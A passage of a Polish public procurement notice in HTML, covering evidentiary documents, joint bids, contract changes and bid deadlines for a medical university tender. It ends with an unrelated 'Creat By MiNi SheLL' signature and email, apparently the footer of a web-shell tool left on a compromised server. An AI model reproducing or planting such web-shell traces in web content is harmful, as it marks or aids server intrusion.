oświadczenia<br/>wykonawcy o aktualności informacji zawartych w oświadczeniu o braku podstaw wykluczenia złożonym<br/>wraz z ofertą – wg Załącznika nr 7 do SWZ,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wykonawca składa wraz z ofertą niżej wymienione przedmiotowe środki dowodowe, na potwierdzenie zgodności oferowanej dostawy z wymaganiami, cechami lub kryteriami określonymi w opisie przedmiotu zamówienia lub opisie kryteriów oceny ofert:<br/>1.1. Opis przedmiotu zamówienia – Załącznik nr 2 do SWZ, w zależności od części, na którą Wykonawca składa ofertę,<br/>1.2. Tabela oceny okresu gwarancji – Załącznik nr 3 do SWZ, w zależności od części, na którą Wykonawca składa ofertę,<br/>1.3. Aktualne materiały informacyjne – nie dotyczy <br/><br/>2.Zamawiający wymaga załączenia materiałów informacyjnych w języku polskim, o ile załącznik nr 2 do SWZ nie stanowi inaczej.<br/>3.Zamawiający zaakceptuje równoważne przedmiotowe środki dowodowe, jeżeli będą potwierdzały, że oferowana dostawa spełnia określone przez zamawiającego wymagania, cechy lub kryteria.<br/>4.Jeżeli wykonawca nie złoży przedmiotowych środków dowodowych lub przedmiotowe środki będą niekompletne, zamawiający wezwie do ich złożenia lub uzupełniania w wyznaczonym terminie.<br/>5. Zamawiający informuje, że pomimo przewidzenia wezwania, nie wezwie do złożenia lub uzupełnienia przedmiotowych środków dowodowych, jeżeli przedmiotowy środek dowodowy służy potwierdzeniu zgodności z cechami lub kryteriami określonymi w opisie kryteriów oceny ofert lub gdy mimo złożenia przedmiotowego środka dowodowego oferta będzie podlegała odrzuceniu albo zajdą przesłanki unieważnienia postępowania. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zgodnie z art. 101 ust. 4 ustawy Pzp w sytuacji gdyby w dokumentach opisujących przedmiot<br/>zamówienia, zawarto odniesienie do norm, ocen technicznych, specyfikacji technicznych i<br/>systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 Pzp a takim<br/>odniesieniom nie towarzyszyło wyrażenie „lub równoważne”, to Zamawiający dopuszcza<br/>rozwiązania równoważne opisywanym w każdej takiej normie, ocenie technicznej, specyfikacji<br/>technicznej, systemowi referencji technicznych. W związku z powyższym należy przyjąć, że<br/>każdej: normie, ocenie technicznej, specyfikacji technicznej, systemie referencji technicznych<br/>występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub równoważne". Zgodnie<br/>z art. 101 ust. 5 Pzp wykonawca, który powołuje się na rozwiązania równoważne opisywanym w<br/>tych dokumentach, jest obowiązany udowodnić, poprzez dołączenie do oferty stosownych<br/>przedmiotowych środków dowodowych, o których mowa w art. 104–107 Pzp, że proponowane<br/>rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu<br/>zamówienia.<br/>Jeżeli wykonawca nie złoży przedmiotowych środków dowodowych lub przedmiotowe środki<br/>będą niekompletne, zamawiający wezwie do ich złożenia lub uzupełniania w wyznaczonym<br/>terminie.<br/>Zamawiający informuje, że pomimo przewidzenia wezwania, nie wezwie do złożenia lub<br/>uzupełnienia przedmiotowych środków dowodowych, jeżeli przedmiotowy środek dowodowy<br/>służy potwierdzeniu zgodności z cechami lub kryteriami określonymi w opisie kryteriów oceny<br/>ofert lub gdy mimo złożenia przedmiotowego środka dowodowego oferta będzie podlegała<br/>odrzuceniu albo zajdą przesłanki unieważnienia postępowania. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku ustanawiają pełnomocnika do ich reprezentowania w postępowaniu o udzielenie zamówienia publicznego, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia. Dokument pełnomocnictwa musi być załączony do oferty i zawierać w szczególności wskazanie: postępowania o zamówienie publiczne, którego dotyczy, wykonawców wspólnie ubiegających się o udzielenie zamówienia, ustanowionego pełnomocnika oraz zakres jego umocowania, obejmujący przede wszystkim: reprezentowanie wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, zaciąganie zobowiązań w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, złożenie oferty wspólnie, prowadzenie korespondencji i podejmowanie zobowiązań związanych z postępowaniem o udzielenie zamówienia publicznego.<br/><br/>2.	Dokument pełnomocnictwa musi być podpisany przez wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia, w tym wykonawcę ustanowionego jako pełnomocnika i przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji wykonawcy. Dokument pełnomocnictwa (oryginał lub kserokopia potwierdzona notarialnie), należy dołączyć do oferty w formie elektronicznej, podpisanej kwalifikowanym podpisem elektronicznym lub postaci elektronicznej podpisanej podpisem zaufanym lub podpisem osobistym.<br/>Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik pozostałych, przy czym płatności będą przekazywane wprost na konto danego podmiotu (wyłącznie wskazanego w umowie) lub na utworzone wspólne konto rozliczeniowe, na które wpłacane będą należności za świadczenia wykonane przez poszczególne podmioty.<br/><br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/><br/>4.	Zamawiający zastrzega sobie prawo do zażądania przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej zasady współpracy wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej pod rygorem<br/>nieważności i będą dopuszczalne w granicach unormowania artykułu 455 ustawy Prawo<br/>zamówień publicznych <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-22 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://umedbialystok.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-22 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com